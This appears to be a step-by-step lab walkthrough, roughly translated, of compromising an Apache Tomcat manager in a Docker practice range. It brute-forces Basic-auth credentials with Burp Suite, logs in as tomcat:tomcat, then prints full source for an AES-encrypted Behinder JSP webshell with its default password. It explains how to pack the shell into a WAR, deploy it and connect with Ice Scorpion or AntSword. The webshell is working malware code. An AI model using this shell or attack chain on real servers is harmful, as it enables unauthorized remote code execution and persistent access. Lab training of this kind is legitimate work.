1. Start the shooting range
access file
enter directory
into the shooting range
launch range
docker-compose up -d
2. Check the ip address
3. Use nmap to scan ip
It is found that there is a port of 8080, and the port is open, built by apache and tomcat
4. Access the port of the ip address
Click on the Manager app
6. Turn on BP to capture packets
Just enter the account and password
Pay attention to this piece when capturing packets, this is the encryption method of base64
7. Perform base64 decryption
interface content.
11111 11111 is the account number and password we just entered. And the middle: is used to separate
8. Blast the account number and password
add it as a variable
\
Set the first parameter, 1 corresponds to the username
Select the dictionary to use
After selection, click add
select the second parameter
Corresponding to the user:password:.
Since: is known, we don’t need to choose a dictionary, just write: just go in
Click add again.
setup complete
Select 3. Set the third parameter
The third parameter corresponds to the user: password, the password in
Select a dictionary and load it
click add
Set base64 encoding in payload processing
Since bp will automatically url-encode symbols, it is necessary to uncheck the default Payload Encoding
Start blasting.
Click on this status code 200.
View packets.
Select the previously set variable and send it to the Decoder module for decoding
tomcat:tomcat
for username and password
9. Login account
、、
login successful
10. Prepare a jsp Trojan horse
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
11. Make a war package
Compress the .jsp file into a .zip format
Change the suffix of .zip to .war.
12. Deploy the war package on Tomcat
Upload the .war package just made
Click Deploy
13. Check whether the x.war package in the application list is uploaded successfully
Here is the upload success
14. Access the .jsp file just uploaded
If the .war you uploaded is called x.jsp, for example, then the directory is
##http:/192.168.189.131:8080/x/x.jsp
and so on
A blank interface means success
15. Use Ice Scorpion or Ant Sword to connect
Connection password: rebeyond